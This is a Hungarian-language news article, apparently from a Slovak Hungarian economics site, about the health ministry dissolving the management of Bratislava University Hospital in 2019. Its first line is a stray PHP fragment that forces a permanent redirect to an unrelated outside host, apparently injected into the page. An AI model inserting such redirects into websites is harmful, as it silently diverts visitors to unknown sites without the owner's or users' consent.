header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> Az egészségügyi minisztérium feloszlatta a legnagyobb kórház vezetését
hétfő, május 27, 2019

Keresés

Az egészségügyi minisztérium feloszlatta a legnagyobb kórház vezetését

2806Juraj Kovács a Pozsonyi Egyetemi Kórház (UNB) vezérigazgatója távozik a posztjáról. Helyét ideiglenesen Renáta Vandriaková igazgató veszi át. Kovács távozásával feloszlik az igazgatók tanácsa is, amely a kórház irányításáért felel.

A tárca a változásokat az új vezetési modell bevezetésével magyarázza. Szlovákia legnagyobb egészségügyi intézményét 5 önálló munkarészleg alkotja, amelyek vezetését mostanáig a vezérigazgató, az orvosi szakmai igazgató és a gazdasági igazgató látta el.

A minisztérium úgy döntött, hogy visszatér a régi modellhez, így az intézmény élén csak a vezérigazgató fog állni, az egyes kórházakat pedig a helyettesei fogják vezetni.

A változások fő célkitűzése a vezetés hatékonyabbá tétele: „A gyakorlat azt mutatja, hogy az intézményszintű döntési folyamtokba szükséges bevonni az UNB-t képező kórházak vezetőit" – magyarázta Zuzana Eliášova, a minisztérium szóvivője.

Az vezetési modell teljes bevezetéséig ideiglenesen Renáta Vandriaková fogja irányítani az UNB-t, ugyanakkor folyamatban a pályázati felhívás előkészítése az igazgatói poszt betöltésére.

Juraj Kovács a Deloitte társaságtól került az UNB-be, ahol előbb gazdasági igazgatóként tevékenykedett. Miután elődje Miroslava Bdžocha távozott megkapta a vezérigazgatói bársonyszéket.

Az egészségügyi minisztérium alá tartozó egyéb intézmények továbbra is a régi struktúra szerint fognak működni, azaz az Igazgatók Tanácsa fogja őket irányítani.

A tárca a régi modell bevezetését annak idején „a nagyobb felelősség vállalással és a fokozottabb ellenőrzés szükségességével indokolta".

(eTrend.sk/Gazdaság.sk)

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia